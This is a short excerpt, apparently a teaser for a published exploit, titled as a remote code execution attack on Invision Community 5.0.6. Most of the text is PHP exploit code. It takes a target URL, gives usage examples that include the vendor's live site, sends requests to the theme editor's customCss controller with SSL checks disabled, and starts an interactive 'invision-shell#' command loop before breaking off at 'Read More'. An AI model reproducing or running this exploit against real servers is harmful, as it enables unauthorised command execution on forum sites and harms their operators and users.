Invision Community 5.0.6 – Remote Code Execution (RCE)

\n”; print “\nExample….: php $argv[0] http://localhost/invision/”; print “\nExample….: php $argv[0] https://invisioncommunity.com/\n\n”; die(); } $ch = curl_init(); $params = [“app” => “core”, “module” => “system”, “controller” => “themeeditor”, “do” => “customCss”]; curl_setopt($ch, CURLOPT_URL, $argv[1]); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); while (1) { print “\ninvision-shell# “; if (($cmd =…

Read More